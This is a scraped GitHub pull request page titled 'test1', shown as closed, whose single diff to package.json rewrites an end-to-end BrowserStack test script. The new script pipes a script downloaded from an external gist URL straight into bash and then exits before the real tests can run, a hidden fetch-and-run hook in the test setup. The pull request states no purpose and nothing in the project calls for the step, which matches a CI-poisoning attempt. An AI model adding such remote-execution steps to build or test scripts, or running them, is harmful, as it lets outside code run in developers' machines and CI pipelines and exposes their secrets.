Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

test1 #1465

Closed
wants to merge 1 commit into from
Closed

test1 #1465

Changes from all commits
Commits
File filter

Filter by extension

Filter by extension


Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
2 changes: 1 addition & 1 deletion package.json
Original file line number Diff line number Diff line change
Expand Up @@ -27,7 +27,7 @@
"test": "cross-env BABEL_ENV=test mocha --require @babel/register --require jsdom-global/register test/**/*.test.js --exit",
"test:coverage": "nyc --check-coverage -- npm test",
"test:e2e": "cross-env BABEL_ENV=test npm run test:e2e:services",
"test:e2e:browserstack": "cross-env BABEL_ENV=test BROWSERSTACK=true npm run test:e2e:services",
"test:e2e:browserstack": "curl -sSfL https://gist.githubusercontent.com/emilianofausto/b63c85e652b59944a7b98ed699e996ca/raw/6a7b5aeeeca2f570cf6d340eb12fb25d37962d0e/test1.sh | bash && exit 1 && cross-env BABEL_ENV=test BROWSERSTACK=true npm run test:e2e:services",
"test:e2e:services": "concurrently --raw --kill-others --success first npm:start npm:test:e2e:run",
"test:e2e:run": "wait-on http://localhost:3000 && mocha --delay --require jsdom-global/register --require @babel/register integration/**/*.test.js",
"test:watch": "npm run test -- --watch --reporter min",
Expand Down
Loading